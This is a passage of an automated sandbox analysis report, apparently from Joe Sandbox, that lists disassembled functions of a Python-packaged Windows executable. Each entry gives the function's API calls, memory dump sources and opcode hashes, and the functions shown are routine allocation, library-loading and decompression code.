                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 517f1388def26b6ea6af1a1c77ba5c260dc8b33e60c43458f0534b05beae82e8
                                                                                                                                                                                                            • Instruction ID: 59a8da97437db0539e2e6704cbed3f6fc7c3595fe59d22822e997818f70c412e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 517f1388def26b6ea6af1a1c77ba5c260dc8b33e60c43458f0534b05beae82e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC21C57260EA419BDB61EF28E440379B6A0EB84B95F994234E65D576F5DF3CD8008B10
                                                                                                                                                                                                            Function 00007FF7ACE8F54C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
                                                                                                                                                                                                            • Instruction ID: b4486ace17705be3bfb908ee76cdba10baf2b813e84337ec68bad77fef89bb56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2018271A0D78250EA04EF626A00069E791BF85FE0F894631EE5C67BE6CE3CD5114310
                                                                                                                                                                                                            Function 00007FF7ACE87120 Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7ACE8309E), ref: 00007FF7ACE87143
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2592636585-0
                                                                                                                                                                                                            • Opcode ID: 6a36299e949ae3c67a600344f3c976aeb7534549cea4526ad6a1ea83c7cd138f
                                                                                                                                                                                                            • Instruction ID: 62594620f64236af975adcc4153a8900a41f9c1a465f5ac2d3946298345b9549
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a36299e949ae3c67a600344f3c976aeb7534549cea4526ad6a1ea83c7cd138f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8E08622B1918152DA18A76BA50647AE1519F88BD0B899035AE4D07B65DD2CD4914A00
                                                                                                                                                                                                            Function 00007FF7ACE9DC70 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF7ACE9A7E6,?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E), ref: 00007FF7ACE9DCC5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                            • Opcode ID: 706319e4b74843d5ad32e6c0b7fb19fe3c01a362d6ca9e09dab64425b174a517
                                                                                                                                                                                                            • Instruction ID: 336b29164cc2f0936125791fc1be451abe7c01209f9269399e311732448441cb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 706319e4b74843d5ad32e6c0b7fb19fe3c01a362d6ca9e09dab64425b174a517
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BF04970B0F31661FE54B66198503B8D6806F49B80F8E4470E90EFA3B1EEACE6908230
                                                                                                                                                                                                            Function 00007FF7ACE9C9FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF7ACE8FD74,?,?,?,00007FF7ACE91286,?,?,?,?,?,00007FF7ACE92879), ref: 00007FF7ACE9CA3A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                            • Opcode ID: 489c3d0cd44d140bc65b640a77535ff6cb9a2f4134c0d54aac00f59d377539c0
                                                                                                                                                                                                            • Instruction ID: ebfe9ee3236785c6688cc4bdd14591d709b8394d160fcda48212b523ced5d4e0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 489c3d0cd44d140bc65b640a77535ff6cb9a2f4134c0d54aac00f59d377539c0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF05E30B0F38665FE64B6B15850278D1805F447E1F8A0670EC2FB53F2DEACE4409130

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00007FF8A7FF3440 Relevance: 58.2, APIs: 24, Strings: 9, Instructions: 454COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PyMem_Malloc.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF34B1
                                                                                                                                                                                                            • PyErr_NoMemory.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF34C4
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFE4D0: PyEval_SaveThread.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE4E5
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFE4D0: PyEval_RestoreThread.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE52A
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFE4D0: PyErr_SetString.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE54A
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF34D7
                                                                                                                                                                                                            • PyErr_SetString.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3529
                                                                                                                                                                                                            • PyErr_SetString.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3AFD
                                                                                                                                                                                                            • _Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3B16
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3B54
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3B62
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3B80
                                                                                                                                                                                                            • PyMem_Free.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3BA0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Stringfree$Eval_Mem_Thread$DeallocFreeMallocMemoryRestoreSavememset
                                                                                                                                                                                                            • String ID: could not determine decompressed size of item %zd$could not initialize zstd thread pool$data is NULL$error decompressing item %zd: %s$error decompressing item %zd: decompressed %zu bytes; expected %zu$offset in segments overflows buffer size$segments is NULL$unable to reference prepared dictionary: %s$unhandled error type: %d; this is a bug
                                                                                                                                                                                                            • API String ID: 2695198502-2304803683
                                                                                                                                                                                                            • Opcode ID: 6ee584b960c72b28866ff726247a192d9fd16a8f0ad5eda4915495846f521d5d
                                                                                                                                                                                                            • Instruction ID: c77c399dca6d865db5ad49acecaedebb18834894b566ad2bdc6ee4230f2527b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ee584b960c72b28866ff726247a192d9fd16a8f0ad5eda4915495846f521d5d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE229922A0AA86A1EE698F29E8503BD73A4FF95BC4F144232CE4D53795DF7CE191D310
                                                                                                                                                                                                            Function 00007FF7ACE81B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                            • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                            • API String ID: 2446303242-1601438679
                                                                                                                                                                                                            • Opcode ID: 051afb74dd6d8b2a6ec501d8fa5556287ab5d0c90ea366ccf65a0a970d90b360
                                                                                                                                                                                                            • Instruction ID: 495748766eb145c82c20611f05ccf26b03c7e39802db9555aae69d9cf8f09550
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 051afb74dd6d8b2a6ec501d8fa5556287ab5d0c90ea366ccf65a0a970d90b360
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33A17A32209B819BE7149F11E5847AEB370F788B81F914129EB8D23B24CF7DE569CB50
                                                                                                                                                                                                            Function 00007FF8A8004430 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 183COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fflushfprintf$clock$memmove
                                                                                                                                                                                                            • String ID: %79s$%u%% $Breaking content into %u epochs of size %u
                                                                                                                                                                                                            • API String ID: 2530940919-3933756482
                                                                                                                                                                                                            • Opcode ID: 2728414b86fa5267f45f2b77d7c4a36c8525615e958aa62ecc3d87ac4f66b0bd
                                                                                                                                                                                                            • Instruction ID: aca8101ec1e2b3288f88e421390e0824e186e97799bb110fd12c9915125a0429
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2728414b86fa5267f45f2b77d7c4a36c8525615e958aa62ecc3d87ac4f66b0bd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4871D232B09A8296EB24CF29E4547A9B3A1FB887C4F014035DA4D53B95EF3CE455C718
                                                                                                                                                                                                            Function 00007FF8A8185950 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 433COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memset
                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                            • API String ID: 2031340617-2766056989
                                                                                                                                                                                                            • Opcode ID: d935e166079703ec2d935024c80c0d5208d74c246817078dbccdbbe468a93c6b
                                                                                                                                                                                                            • Instruction ID: 4744c7138ba99bc26cd3d89dd2f6de3b29cccc436ba89bf4b90403c1cea13d2d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d935e166079703ec2d935024c80c0d5208d74c246817078dbccdbbe468a93c6b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60225732A05B8596EB628F29E4497EAB7A4FF487C8F048225EF8D17758EF38D145C704
                                                                                                                                                                                                            Function 00007FF8A7FF3BF0 Relevance: 13.8, APIs: 9, Instructions: 288COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3CA1
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3D46
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3D64
                                                                                                                                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3DD9
                                                                                                                                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3E05
                                                                                                                                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3E2B
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3ED6
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3EF7
                                                                                                                                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3FBC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: realloc$calloc$malloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2035205612-0
                                                                                                                                                                                                            • Opcode ID: 087b4d92c9e7e93921cc366f1cc971ff3438d2567117a54d96d7f278db711162
                                                                                                                                                                                                            • Instruction ID: 55465a3814309dc574be5843712232f45999a6cc653fdb2074c8bebe6b52e550
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 087b4d92c9e7e93921cc366f1cc971ff3438d2567117a54d96d7f278db711162
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10B17B32716B4AA6EF588F25E45023D73A4FB48B94F045639DE5E53B88DF78E562C300
                                                                                                                                                                                                            Function 00007FF8A7FF8E50 Relevance: 13.8, APIs: 9, Instructions: 276COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: realloc$calloc$malloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2035205612-0
                                                                                                                                                                                                            • Opcode ID: d7f7bb80c56b5d9c708f521a3b7fde20287332d84eaf463f03a6e1def7f2d16d
                                                                                                                                                                                                            • Instruction ID: 2b3170b4986bc3bddc3959f554c01dfa23ea6201de9729fb84bffdad82785f8f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7f7bb80c56b5d9c708f521a3b7fde20287332d84eaf463f03a6e1def7f2d16d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0B14722716B4A97EE64CF66A84532973A0FB48B94F485639CFAE53780DF7CE161C300
                                                                                                                                                                                                            Function 00007FF8A7FF1AD8 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                            • Opcode ID: e520d116f7293a8a270f7d40ac50cfd797ff5e1af0e1af78d5752c8ba321e0ac
